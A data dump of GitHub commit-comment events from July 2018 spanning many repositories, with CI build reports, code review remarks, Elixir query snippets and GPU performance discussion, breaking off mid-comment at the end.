{"id":"7984977548","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29754838,"position":null,"line":null,"path":null,"commit_id":"3426530b1bd0ede56bccf22d0f9571e0c4762774","created_at":"2018-07-18T19:24:36Z","updated_at":"2018-07-18T19:24:36Z","author_association":"NONE","body":"158988131-Outdoor-air-node-wet-bulb-EMS-override (lgu1234) - x86_64-MacOS-10.9-clang: OK (2942 of 2944 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n * 2 tests had: EIO diffs.\n * 1 test had: ERR diffs.\n * 2 tests had: ESO big diffs.\n * 2 tests had: Table big diffs.\n * 1 test had: MTR big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 621\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3426530b1bd0ede56bccf22d0f9571e0c4762774-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3426530b1bd0ede56bccf22d0f9571e0c4762774-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.93%25-yellow.png)</a> \n"}},"created_at":"2018-07-18T19:24:36Z"}
{"id":"7984977598","type":"CommitCommentEvent","actor":{"login":"tassoevan"},"repo":{"name":"RocketChat/Rocket.Chat"},"payload":{"comment":{"id":29754840,"position":5,"line":6,"path":"packages/rocketchat-ui/client/components/icon.js","commit_id":"ec92ef6367fe067d892447a8b9d471c651a3658d","created_at":"2018-07-18T19:24:37Z","updated_at":"2018-07-18T19:24:37Z","author_association":"CONTRIBUTOR","body":"I'll check that."}},"created_at":"2018-07-18T19:24:37Z"}
{"id":"7984978019","type":"CommitCommentEvent","actor":{"login":"cristealucian97"},"repo":{"name":"cristealucian97/homeautomationbeta"},"payload":{"comment":{"id":29754842,"position":53,"line":101,"path":"rest_api_impl/src/test/java/com/home/automation/rest_api_impl/dashboard/DashboardControllerTest.java","commit_id":"28b35a3283826fcf97f60515004592781b6f9383","created_at":"2018-07-18T19:24:42Z","updated_at":"2018-07-18T19:24:42Z","author_association":"OWNER","body":"ii de ajuns Assert.assertTrue(result >= 0);...nu ai nevoie de urmatoarea linie\r\n"}},"created_at":"2018-07-18T19:24:42Z"}
{"id":"7984999110","type":"CommitCommentEvent","actor":{"login":"alexey-tsvetkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29754875,"position":21,"line":389,"path":"libraries/tools/kotlin-gradle-plugin/src/main/kotlin/org/jetbrains/kotlin/gradle/internal/kapt/Kapt3KotlinGradleSubplugin.kt","commit_id":"ce6a999fb434af70a0d2da9dc848f2b809c96d20","created_at":"2018-07-18T19:29:14Z","updated_at":"2018-07-18T19:29:14Z","author_association":"CONTRIBUTOR","body":"We can avoid setting the property from outside:\r\n```\r\n@get:Internal\r\nval isAndroidProject: Boolean get() = project.plugins.any { it is KotlinAndroidPluginWrapper } \r\n```"}},"created_at":"2018-07-18T19:29:14Z"}
{"id":"7984999915","type":"CommitCommentEvent","actor":{"login":"salotron"},"repo":{"name":"salotron/scenario_alt"},"payload":{"comment":{"id":29754878,"position":31,"line":34,"path":"Config/res/7dl_vars_common.rpy","commit_id":"7772c83ef792d73f2db3fb4a52104834a904d351","created_at":"2018-07-18T19:29:23Z","updated_at":"2018-07-18T19:29:23Z","author_association":"OWNER","body":"ba => am"}},"created_at":"2018-07-18T19:29:23Z"}
{"id":"7985001948","type":"CommitCommentEvent","actor":{"login":"gideaoms"},"repo":{"name":"gideaoms/react-spotify-clone"},"payload":{"comment":{"id":29754881,"position":1,"line":1,"path":"README.md","commit_id":"775d50350459cdfe712d866f36946afbcb59856f","created_at":"2018-07-18T19:29:49Z","updated_at":"2018-07-18T19:29:49Z","author_association":"OWNER","body":"atual"}},"created_at":"2018-07-18T19:29:49Z"}
{"id":"7985004271","type":"CommitCommentEvent","actor":{"login":"RoyEJohnson"},"repo":{"name":"openstax/os-webview"},"payload":{"comment":{"id":29754887,"position":null,"line":null,"path":null,"commit_id":"d99c6c766231614e2749646888797a7fc0ec50c5","created_at":"2018-07-18T19:30:18Z","updated_at":"2018-07-18T19:30:18Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Interest form lead in salesforce has blank 'adoption stage'](https://trello.com/c/06Kxq2Os/787-interest-form-lead-in-salesforce-has-blank-adoption-stage)"}},"created_at":"2018-07-18T19:30:18Z"}
{"id":"7985006143","type":"CommitCommentEvent","actor":{"login":"rajavrk"},"repo":{"name":"rajavrk/First_Sample"},"payload":{"comment":{"id":29754891,"position":null,"line":null,"path":null,"commit_id":"0e7bd863e4ca1cf56bf523b7ebc46609b94d3b2e","created_at":"2018-07-18T19:30:40Z","updated_at":"2018-07-18T19:30:40Z","author_association":"OWNER","body":"1st Commit"}},"created_at":"2018-07-18T19:30:40Z"}
{"id":"7985006981","type":"CommitCommentEvent","actor":{"login":"azlux"},"repo":{"name":"bitblaster/log2ram"},"payload":{"comment":{"id":29754894,"position":5,"line":5,"path":"log2ram","commit_id":"251462279327080a0c00bd49c2db2662953c81bf","created_at":"2018-07-18T19:30:50Z","updated_at":"2018-07-18T19:30:50Z","author_association":"NONE","body":"This will case you lot of trouble in case a the mount point isn't working. The check will not work because `/var/log.hdd`and `/var/log` start with the same string"}},"created_at":"2018-07-18T19:30:50Z"}
{"id":"7985007072","type":"CommitCommentEvent","actor":{"login":"yanex"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29754896,"position":21,"line":389,"path":"libraries/tools/kotlin-gradle-plugin/src/main/kotlin/org/jetbrains/kotlin/gradle/internal/kapt/Kapt3KotlinGradleSubplugin.kt","commit_id":"ce6a999fb434af70a0d2da9dc848f2b809c96d20","created_at":"2018-07-18T19:30:51Z","updated_at":"2018-07-18T19:30:51Z","author_association":"CONTRIBUTOR","body":"👍 "}},"created_at":"2018-07-18T19:30:51Z"}
{"id":"7985007396","type":"CommitCommentEvent","actor":{"login":"gcttong"},"repo":{"name":"phac-nml/biohansel"},"payload":{"comment":{"id":29754897,"position":10,"line":9,"path":"bio_hansel/scripts/write_sequence.py","commit_id":"f094037d9569b8290efc2136dc3d3bf58039c2e5","created_at":"2018-07-18T19:30:55Z","updated_at":"2018-07-18T19:30:55Z","author_association":"COLLABORATOR","body":"yup you're right, this has been addressed in 3005022974d1edbcbe8610fe92ccb69dc94ee7e6"}},"created_at":"2018-07-18T19:30:55Z"}
{"id":"7985011515","type":"CommitCommentEvent","actor":{"login":"duczi"},"repo":{"name":"duczi/hello-world"},"payload":{"comment":{"id":29754901,"position":null,"line":null,"path":null,"commit_id":"2cc571383269d60ad3dc27bf51915ef093ff8f40","created_at":"2018-07-18T19:31:48Z","updated_at":"2018-07-18T19:31:48Z","author_association":"OWNER","body":"Well, that last comment was two years ago. I've replaced Texinfo with LaTeX and Perl scripts. Functionally, the same, maybe looks better, but more work to set up."}},"created_at":"2018-07-18T19:31:48Z"}
{"id":"7985012678","type":"CommitCommentEvent","actor":{"login":"deveee"},"repo":{"name":"supertuxkart/stk-code"},"payload":{"comment":{"id":29754904,"position":null,"line":null,"path":null,"commit_id":"d14916dec2642140d9381af01333a703c903ec02","created_at":"2018-07-18T19:32:04Z","updated_at":"2018-07-18T19:32:04Z","author_association":"MEMBER","body":"The revert revert works fine, so I will commit."}},"created_at":"2018-07-18T19:32:04Z"}
{"id":"7985012724","type":"CommitCommentEvent","actor":{"login":"Gemorroj"},"repo":{"name":"symfony/webpack-encore"},"payload":{"comment":{"id":29754905,"position":null,"line":null,"path":null,"commit_id":"c247131aa8ec4a4c1582fd3e862539461113402a","created_at":"2018-07-18T19:32:04Z","updated_at":"2018-07-18T19:32:04Z","author_association":"NONE","body":"Thank you for your work."}},"created_at":"2018-07-18T19:32:04Z"}
{"id":"7985015591","type":"CommitCommentEvent","actor":{"login":"tramyardg"},"repo":{"name":"tramyardg/angularjs-tut"},"payload":{"comment":{"id":29754912,"position":null,"line":null,"path":null,"commit_id":"424098d1cd0ebbc45a95b84b7f5f15e3f0080b7a","created_at":"2018-07-18T19:32:41Z","updated_at":"2018-07-18T19:32:41Z","author_association":"OWNER","body":"Output of this commit:\r\n![image](https://user-images.githubusercontent.com/5623994/42903429-cb2120e8-8a9f-11e8-919e-6abb8f79e06e.png)\r\n"}},"created_at":"2018-07-18T19:32:41Z"}
{"id":"7985018764","type":"CommitCommentEvent","actor":{"login":"frap129"},"repo":{"name":"OpenWatchProject/android_device_mediatek_harmony"},"payload":{"comment":{"id":29754917,"position":null,"line":null,"path":null,"commit_id":"61724febce29f5729596e74b0a67b8adec2b89be","created_at":"2018-07-18T19:33:23Z","updated_at":"2018-07-18T19:33:23Z","author_association":"MEMBER","body":"This (and the commit before this) are redundant now that you set product_characteristics to watch. grep Settings for product=\"watch\" to see every string that changes\r\n"}},"created_at":"2018-07-18T19:33:23Z"}
{"id":"7985020714","type":"CommitCommentEvent","actor":{"login":"VanessaSOliveira"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29754919,"position":null,"line":null,"path":null,"commit_id":"17041cb247ad485c5686995026ee73b43e94f55a","created_at":"2018-07-18T19:33:50Z","updated_at":"2018-07-18T19:33:50Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Refatoração das views](https://trello.com/c/2vCXtjkh/219-refatora%C3%A7%C3%A3o-das-views)"}},"created_at":"2018-07-18T19:33:50Z"}
{"id":"7985022741","type":"CommitCommentEvent","actor":{"login":"Paulchen-Panther"},"repo":{"name":"abrenoch/hyperion-android-grabber"},"payload":{"comment":{"id":29754923,"position":72,"line":130,"path":"common/src/main/java/com/abrenoch/hyperiongrabber/common/network/Hyperion.java","commit_id":"8e5b0b86e5f6b33ac2bcceb1d5e297773bf7774d","created_at":"2018-07-18T19:34:16Z","updated_at":"2018-07-18T19:34:16Z","author_association":"COLLABORATOR","body":"which purpose actually fulfills this?"}},"created_at":"2018-07-18T19:34:16Z"}
{"id":"7985024789","type":"CommitCommentEvent","actor":{"login":"VanessaSOliveira"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29754926,"position":null,"line":null,"path":null,"commit_id":"6635193556d98f4e9b8049aaf39c101890cb26c4","created_at":"2018-07-18T19:34:42Z","updated_at":"2018-07-18T19:34:42Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Refatoração das views](https://trello.com/c/2vCXtjkh/219-refatora%C3%A7%C3%A3o-das-views)"}},"created_at":"2018-07-18T19:34:42Z"}
{"id":"7985024932","type":"CommitCommentEvent","actor":{"login":"valcris"},"repo":{"name":"valcris/Larissa_Project"},"payload":{"comment":{"id":29754927,"position":null,"line":null,"path":null,"commit_id":"1e3912d977e91da2c2f2418221d259164c01f8ff","created_at":"2018-07-18T19:34:44Z","updated_at":"2018-07-18T19:34:44Z","author_association":"OWNER","body":"Este notebook mostra o enorme efeito de borda quando colocamos a área da camada equivalente menor que a área do Grid dos dados. A camada equivalente está estimando a componente  regional de gz"}},"created_at":"2018-07-18T19:34:44Z"}
{"id":"7985026066","type":"CommitCommentEvent","actor":{"login":"jaycedowell"},"repo":{"name":"nithyanandan/EPIC"},"payload":{"comment":{"id":29754930,"position":null,"line":null,"path":null,"commit_id":"26ece00054952e44837043125590263504ccb0e0","created_at":"2018-07-18T19:34:59Z","updated_at":"2018-07-18T19:34:59Z","author_association":"COLLABORATOR","body":"I think that the initial stutter is from creating/moving the grid and result arrays over to the GPU.  We could probably get better performance by using pinned, aka, cuda_host, memory.  We could also hide it by moving the array initialization into the block initialization so that the memory is ready before we start using it.  \r\n\r\nAnother big performance hit in here is that I'm promoting everything to numpy.complex64 and then transferring to the GPU.  I ended up having to do this because my older GPU (compute capability 3.0) doesn't support ci8+ci8 -> complex64 matrix operations.  This should be possible on newer (cc >= 5.0) GPUs and would save a lot of bandwidth copying to the GPU.\r\n\r\nThe last thing that comes to mind is how/where the images are accumulated.  Right now we are pulling off each image set and then accumulating it.  If we could accumulate on the GPU then we can reduce the number of times we have to copy the image off to once per integration.  I'm not sure how feasible that is, though.  It all depends on if we can move that accumulation step forward or not."}},"created_at":"2018-07-18T19:34:59Z"}
{"id":"7985028518","type":"CommitCommentEvent","actor":{"login":"diracdeltas"},"repo":{"name":"brave-intl/bat-go"},"payload":{"comment":{"id":29754934,"position":11,"line":59,"path":"Gopkg.toml","commit_id":"ab0ec7f6a7092cbabbe19e8251c509c1e95281fe","created_at":"2018-07-18T19:35:31Z","updated_at":"2018-07-18T19:35:31Z","author_association":"NONE","body":"LOL had no idea this existed"}},"created_at":"2018-07-18T19:35:31Z"}
{"id":"7985032360","type":"CommitCommentEvent","actor":{"login":"taniwallach"},"repo":{"name":"mgage/webwork2"},"payload":{"comment":{"id":29754938,"position":16,"line":570,"path":"clients/sendXMLRPC.pl","commit_id":"24a2c89e51c67ef6c7a527d19de860a514a441b5","created_at":"2018-07-18T19:36:20Z","updated_at":"2018-07-18T19:36:20Z","author_association":"NONE","body":"This should be $PDF_DISPLAY_COMMAND"}},"created_at":"2018-07-18T19:36:20Z"}
{"id":"7985039213","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"smiths/caseStudies"},"payload":{"comment":{"id":29754952,"position":5,"line":215,"path":"CaseStudies/ssp/docs/SRS/SRS.tex","commit_id":"84378da6c8f8c64ac88b91a4f932f2b32ed5ca8c","created_at":"2018-07-18T19:37:46Z","updated_at":"2018-07-18T19:37:46Z","author_association":"COLLABORATOR","body":"Removes unnecessary space between newton-meter unit display."}},"created_at":"2018-07-18T19:37:46Z"}
{"id":"7985043377","type":"CommitCommentEvent","actor":{"login":"josevalim"},"repo":{"name":"poanetwork/poa-explorer"},"payload":{"comment":{"id":29754959,"position":21,"line":2737,"path":"apps/explorer/lib/explorer/chain.ex","commit_id":"d9129b8d2ae6d98c18f665c31c7cf7c60b1779b4","created_at":"2018-07-18T19:38:40Z","updated_at":"2018-07-18T19:38:40Z","author_association":"NONE","body":"@feliperenan can you please paste your macro and the `where` code?"}},"created_at":"2018-07-18T19:38:40Z"}
{"id":"7985046000","type":"CommitCommentEvent","actor":{"login":"Marlombrei"},"repo":{"name":"Marlombrei/Second_Repository"},"payload":{"comment":{"id":29754965,"position":null,"line":null,"path":null,"commit_id":"1f7847a1527516805ecbf6eabc75f772272c8891","created_at":"2018-07-18T19:39:14Z","updated_at":"2018-07-18T19:39:14Z","author_association":"OWNER","body":"o primeiro comentario de um commit"}},"created_at":"2018-07-18T19:39:14Z"}
{"id":"7985046538","type":"CommitCommentEvent","actor":{"login":"berezovskyi"},"repo":{"name":"EricssonResearch/scott-eu"},"payload":{"comment":{"id":29754966,"position":24,"line":13,"path":"deployment/docker-compose.yml","commit_id":"5eb42fceb973d53a558e189a36980d842c2dd32e","created_at":"2018-07-18T19:39:21Z","updated_at":"2018-07-18T19:39:21Z","author_association":"CONTRIBUTOR","body":"why do we need this? it completely breaks my local swarm debugging!"}},"created_at":"2018-07-18T19:39:21Z"}
{"id":"7985046612","type":"CommitCommentEvent","actor":{"login":"abrenoch"},"repo":{"name":"abrenoch/hyperion-android-grabber"},"payload":{"comment":{"id":29754967,"position":72,"line":130,"path":"common/src/main/java/com/abrenoch/hyperiongrabber/common/network/Hyperion.java","commit_id":"8e5b0b86e5f6b33ac2bcceb1d5e297773bf7774d","created_at":"2018-07-18T19:39:22Z","updated_at":"2018-07-18T19:39:22Z","author_association":"OWNER","body":"It was mostly placeholder code... Should maybe throw an IOException or something if the reply could not be parsed? I'm open to suggestions."}},"created_at":"2018-07-18T19:39:22Z"}
{"id":"7985046683","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29754969,"position":null,"line":null,"path":null,"commit_id":"2d029a9105e631b293db1cc4d3b6c052b5769b82","created_at":"2018-07-18T19:39:23Z","updated_at":"2018-07-18T19:39:23Z","author_association":"NONE","body":"159149473-Bug-in-surface-dot/cross-product-calculation-#6834 (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2942 of 2942 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-18T19:39:23Z"}
{"id":"7985051513","type":"CommitCommentEvent","actor":{"login":"aitorp6"},"repo":{"name":"deeponion/electrum-deeponion"},"payload":{"comment":{"id":29754977,"position":null,"line":null,"path":null,"commit_id":"f70d003b50a89edf1c42f3963ce9c3d2338af881","created_at":"2018-07-18T19:40:25Z","updated_at":"2018-07-18T19:40:25Z","author_association":"COLLABORATOR","body":"Nice, thank you"}},"created_at":"2018-07-18T19:40:25Z"}
{"id":"7985052791","type":"CommitCommentEvent","actor":{"login":"jaycedowell"},"repo":{"name":"nithyanandan/EPIC"},"payload":{"comment":{"id":29754978,"position":null,"line":null,"path":null,"commit_id":"26ece00054952e44837043125590263504ccb0e0","created_at":"2018-07-18T19:40:40Z","updated_at":"2018-07-18T19:40:40Z","author_association":"COLLABORATOR","body":"Oh, and the channel thing should be fixed in the commit after this.\r\n\r\nAlso, if you want to look into moving over to ci8 I think I can tear myself away and not touch the script for a while."}},"created_at":"2018-07-18T19:40:40Z"}
{"id":"7985052956","type":"CommitCommentEvent","actor":{"login":"yoon-hong"},"repo":{"name":"droid-squad/Natville"},"payload":{"comment":{"id":29754979,"position":45,"line":63,"path":"app/src/main/java/me/jwill2385/natville/MainActivity.java","commit_id":"3f2247c0474b793f3ff1ae574a368268c6ac23a7","created_at":"2018-07-18T19:40:42Z","updated_at":"2018-07-18T19:40:42Z","author_association":"NONE","body":"remove after done."}},"created_at":"2018-07-18T19:40:42Z"}
{"id":"7985053927","type":"CommitCommentEvent","actor":{"login":"yoon-hong"},"repo":{"name":"droid-squad/Natville"},"payload":{"comment":{"id":29754983,"position":53,"line":71,"path":"app/src/main/java/me/jwill2385/natville/MainActivity.java","commit_id":"3f2247c0474b793f3ff1ae574a368268c6ac23a7","created_at":"2018-07-18T19:40:54Z","updated_at":"2018-07-18T19:40:54Z","author_association":"NONE","body":"ditto"}},"created_at":"2018-07-18T19:40:54Z"}
{"id":"7985060965","type":"CommitCommentEvent","actor":{"login":"juliofozz"},"repo":{"name":"DuduSumeck/PROD"},"payload":{"comment":{"id":29755002,"position":18,"line":224,"path":"OrdemServico/src/br/com/infox/telas/TelaOS.java","commit_id":"0691e4f7c77c22e743afab82ba26078c25d0d1ea","created_at":"2018-07-18T19:42:19Z","updated_at":"2018-07-18T19:42:19Z","author_association":"NONE","body":"dfbcdbbdb"}},"created_at":"2018-07-18T19:42:19Z"}
{"id":"7985061798","type":"CommitCommentEvent","actor":{"login":"MarianFilipovici"},"repo":{"name":"ionut-cristinel/PentaStagiuVara2018Homework"},"payload":{"comment":{"id":29755006,"position":35,"line":35,"path":"Module03Week02/Homework01/Views/Messages/Edit.cshtml","commit_id":"39ceb3880ecd158cf3a6d28d71e8ce7dada01742","created_at":"2018-07-18T19:42:29Z","updated_at":"2018-07-18T19:42:29Z","author_association":"NONE","body":"Foarte buna ideea pentru edit :)\r\nCa sa fie si mai bine poti pastra ordinea celor 2 optiuni iar ca sa ai valoarea pe care o vrei selectata e destul sa pui selected=\"selected\" pe option. De exemplu:\r\n\r\nif (Model.PostType == 0)\r\n{\r\n                        <option value=\"0\" selected=\"selected\">Text</option>\r\n                        <option value=\"1\">Photo</option>\r\n}\r\nelse\r\n{\r\n                        <option value=\"0\">Text</option>\r\n                        <option value=\"1\" selected=\"selected\">Photo</option>\r\n}\r\n\r\nsau mai compact:\r\n\r\n<option value=\"0\" @(Model.PostType == 0 ? \"selected='selected'\" : \"\")>Text</option>\r\n<option value=\"1\" @(Model.PostType == 1 ? \"selected='selected'\" : \"\")>Photo</option>"}},"created_at":"2018-07-18T19:42:29Z"}
{"id":"7985063850","type":"CommitCommentEvent","actor":{"login":"yoon-hong"},"repo":{"name":"droid-squad/Natville"},"payload":{"comment":{"id":29755012,"position":null,"line":null,"path":null,"commit_id":"3f2247c0474b793f3ff1ae574a368268c6ac23a7","created_at":"2018-07-18T19:42:53Z","updated_at":"2018-07-18T19:42:53Z","author_association":"NONE","body":"nit tip:\r\nspace before after keyword like 'else' or 'else if' and between (XXX) and {"}},"created_at":"2018-07-18T19:42:53Z"}
{"id":"7985066844","type":"CommitCommentEvent","actor":{"login":"tramyardg"},"repo":{"name":"tramyardg/angularjs-tut"},"payload":{"comment":{"id":29755020,"position":null,"line":null,"path":null,"commit_id":"7e9127393760b84957fc33609cb7d860204fe2b1","created_at":"2018-07-18T19:43:27Z","updated_at":"2018-07-18T19:43:27Z","author_association":"OWNER","body":"![image](https://user-images.githubusercontent.com/5623994/42903925-4c947e9e-8aa1-11e8-8bf9-061b5392b529.png)\r\n"}},"created_at":"2018-07-18T19:43:27Z"}
{"id":"7985069787","type":"CommitCommentEvent","actor":{"login":"diracdeltas"},"repo":{"name":"brave-intl/bat-go"},"payload":{"comment":{"id":29755024,"position":19,"line":19,"path":"utils/passphrase/passphrase.go","commit_id":"ab0ec7f6a7092cbabbe19e8251c509c1e95281fe","created_at":"2018-07-18T19:44:04Z","updated_at":"2018-07-18T19:44:04Z","author_association":"NONE","body":"probably best to generate a new salt here, per section 3.1 of https://tools.ietf.org/html/rfc5869"}},"created_at":"2018-07-18T19:44:04Z"}
{"id":"7985071380","type":"CommitCommentEvent","actor":{"login":"da3dsoul"},"repo":{"name":"ShokoAnime/ShokoServer"},"payload":{"comment":{"id":29755029,"position":null,"line":null,"path":null,"commit_id":"ca967228a43405d5f4f4fe9795ddc8b8badb7e59","created_at":"2018-07-18T19:44:24Z","updated_at":"2018-07-18T19:44:24Z","author_association":"MEMBER","body":"I had it in else because adding the file will update its state. Was there an issue with it?"}},"created_at":"2018-07-18T19:44:24Z"}
{"id":"7985071458","type":"CommitCommentEvent","actor":{"login":"MarianFilipovici"},"repo":{"name":"ionut-cristinel/PentaStagiuVara2018Homework"},"payload":{"comment":{"id":29755030,"position":2,"line":2,"path":"Module03Week02/Homework01/Views/Shared/_DetailsAboutPosting.cshtml","commit_id":"39ceb3880ecd158cf3a6d28d71e8ce7dada01742","created_at":"2018-07-18T19:44:25Z","updated_at":"2018-07-18T19:44:25Z","author_association":"NONE","body":"Foarte bine ca ai folosit o fereastra modala ;)"}},"created_at":"2018-07-18T19:44:25Z"}
{"id":"7985072172","type":"CommitCommentEvent","actor":{"login":"ajdingazija"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29755031,"position":null,"line":null,"path":null,"commit_id":"ed032ffec375409e42b4ac02e77ba77ee5ea85fb","created_at":"2018-07-18T19:44:34Z","updated_at":"2018-07-18T19:44:34Z","author_association":"NONE","body":"How help me the fix to reinstall the website app, if the website app has already been deleted?\r\nBest regards."}},"created_at":"2018-07-18T19:44:34Z"}
{"id":"7985075587","type":"CommitCommentEvent","actor":{"login":"dustine32"},"repo":{"name":"alliance-genome/agr_loader"},"payload":{"comment":{"id":29755041,"position":162,"line":102,"path":"src/extractors/obo_ext.py","commit_id":"21645dbe270ccc18bc0177ed0d0a3bf18ee30a50","created_at":"2018-07-18T19:45:18Z","updated_at":"2018-07-18T19:45:18Z","author_association":"CONTRIBUTOR","body":"@cmpich Yes, sorry. The commented lines can be deleted. I was initially hesitant to delete them in case I still needed it (though that's what git's for). I should have cleaned this up before pushing.\r\n\r\nDo you want me to fix this is another commit?"}},"created_at":"2018-07-18T19:45:18Z"}
{"id":"7985076478","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29755043,"position":null,"line":null,"path":null,"commit_id":"6bab38082071e7bf042521a680ea3b73958fc360","created_at":"2018-07-18T19:45:29Z","updated_at":"2018-07-18T19:45:29Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [rsyncupdat](https://rsyncupdat-static-docs.pantheonsite.io/docs) Multidev environment:\n- [scripts/deploy-multidev.sh](https://github.com/pantheon-systems/documentation/commit/64b6167f9a1ca986d751e1dfdd9c1f7cd8ff6f06/scripts/deploy-multidev.sh)\n- [scripts/deploy-live.sh](https://github.com/pantheon-systems/documentation/commit/d84075edebc78e989d66cffde7f283f77500e5de/scripts/deploy-live.sh)\n"}},"created_at":"2018-07-18T19:45:29Z"}
{"id":"7985082235","type":"CommitCommentEvent","actor":{"login":"nehoffman"},"repo":{"name":"nehoffman/archweb"},"payload":{"comment":{"id":29755052,"position":null,"line":null,"path":null,"commit_id":"6bc1e35a8646fd9e597e9371f1d56d5b414a0b01","created_at":"2018-07-18T19:46:40Z","updated_at":"2018-07-18T19:46:40Z","author_association":"OWNER","body":"The newline could probably also be filtered out wherever this file is being read from instead. I wasn't sure where to look to find this in the Python code though so I just removed the newline from the file. I am certain that a newline in between the a tag and the ending list tag is what causes the extra spacing."}},"created_at":"2018-07-18T19:46:40Z"}
{"id":"7985084091","type":"CommitCommentEvent","actor":{"login":"capesean"},"repo":{"name":"NetTopologySuite/NetTopologySuite.IO.TopoJSON"},"payload":{"comment":{"id":29755055,"position":null,"line":null,"path":null,"commit_id":"74217423e6d6fce9060fc47fdf0742e6a030180b","created_at":"2018-07-18T19:47:04Z","updated_at":"2018-07-18T19:47:04Z","author_association":"NONE","body":"As `arcs` is not the last token in my Json, line 66 was reading into the next token. Isn't it better to handle the `EndObject` explicitly at the start of the while-loop?"}},"created_at":"2018-07-18T19:47:04Z"}
{"id":"7985086839","type":"CommitCommentEvent","actor":{"login":"dustine32"},"repo":{"name":"alliance-genome/agr_loader"},"payload":{"comment":{"id":29755059,"position":27,"line":24,"path":"src/loaders/go_loader.py","commit_id":"21645dbe270ccc18bc0177ed0d0a3bf18ee30a50","created_at":"2018-07-18T19:47:38Z","updated_at":"2018-07-18T19:47:38Z","author_association":"CONTRIBUTOR","body":"@cmpich Ditto on these commented lines. They can be deleted too. The key mapping stuff should all be handled in obo_ext.py now."}},"created_at":"2018-07-18T19:47:38Z"}
{"id":"7985092149","type":"CommitCommentEvent","actor":{"login":"feliperenan"},"repo":{"name":"poanetwork/poa-explorer"},"payload":{"comment":{"id":29755063,"position":21,"line":2737,"path":"apps/explorer/lib/explorer/chain.ex","commit_id":"d9129b8d2ae6d98c18f665c31c7cf7c60b1779b4","created_at":"2018-07-18T19:48:48Z","updated_at":"2018-07-18T19:48:48Z","author_association":"CONTRIBUTOR","body":"Hey, @josevalim now it's working, I just moved the `macro` to be above the `where_address_fields_match` function. I'm not sure, but how it's a macro, it needs to be compiled before the function that will use it 🤔.\r\n\r\nHow it looks like now:\r\n\r\n```Elixir\r\n  defmacrop exists_token_transfer_with_matching_address_hash(transaction_hash, bytes) do\r\n    quote do\r\n      fragment(\r\n        \"\"\"\r\n        EXISTS (\r\n          SELECT 1\r\n          FROM \"token_transfers\" AS tt\r\n          WHERE tt.\"transaction_hash\" = ? AND tt.\"to_address_hash\" = ?\r\n        )\r\n        \"\"\",\r\n        unquote(transaction_hash),\r\n        unquote(bytes)\r\n      )\r\n    end\r\n  end\r\n\r\n  defp where_address_fields_match(%Ecto.Query{from: {_table, Transaction}} = query, address_hash, nil) do\r\n    where(\r\n      query,\r\n      [t],\r\n      t.to_address_hash == ^address_hash or t.from_address_hash == ^address_hash or\r\n        (is_nil(t.to_address_hash) and\r\n           ^address_hash.bytes in fragment(\r\n             ~s[\r\n            (SELECT i.\"created_contract_address_hash\"\r\n            FROM \"internal_transactions\" AS i\r\n            WHERE (i.\"transaction_hash\" = ?) AND (i.\"type\" = 'create')\r\n            LIMIT 1)\r\n          ],\r\n             t.hash\r\n           )) or exists_token_transfer_with_matching_address_hash(t.hash, ^address_hash.bytes)\r\n    )\r\n  end\r\n```"}},"created_at":"2018-07-18T19:48:48Z"}
{"id":"7985094865","type":"CommitCommentEvent","actor":{"login":"KentJames"},"repo":{"name":"nithyanandan/EPIC"},"payload":{"comment":{"id":29755068,"position":null,"line":null,"path":null,"commit_id":"26ece00054952e44837043125590263504ccb0e0","created_at":"2018-07-18T19:49:21Z","updated_at":"2018-07-18T19:49:21Z","author_association":"COLLABORATOR","body":"The reason I’m accumulating outside the GPU is because I wanted to do EPICal calibration on the CPU, meaning I wanted to select a single pixel and pipe that out on the CPU for each image that comes out. Then we cross that with the F-Domain data (there is a synchronisation issue here which I’m not sure how to solve, have to hold the F-Domain data in memory until the non-squared image it corresponds to is done) and calculate gains and multiply that into next set of F-Domain data. It might be that I don’t have to care about the synchronisation too much, and it’ll work okay anyway.\n\nI’m pretty sure we could move this inside the GPU though, we just need to pull out the pixels(corresponding to the brightest/calibration sources) before we do the square information otherwise we lose the phase information. Indexing memory on the GPU would require a kernel in of itself however… that could be quite inefficient, although CUDA does a good job of stacking kernels when the resources are available.\n\nI need to have a think about all the bandwidths in the system and how much data is going where.\n\nYeah I noticed the channel thing, think that was my fault, who knows. I’m still trying to digest exactly what is happening but I think I’m pretty much there. \n\nAs for tearing yourself away, feel free to keep going, you’ve definitely saved me days of getting my head around things. Think I learnt a few numpy tricks too.. As you’ve solved the most pressing step of finishing the basic 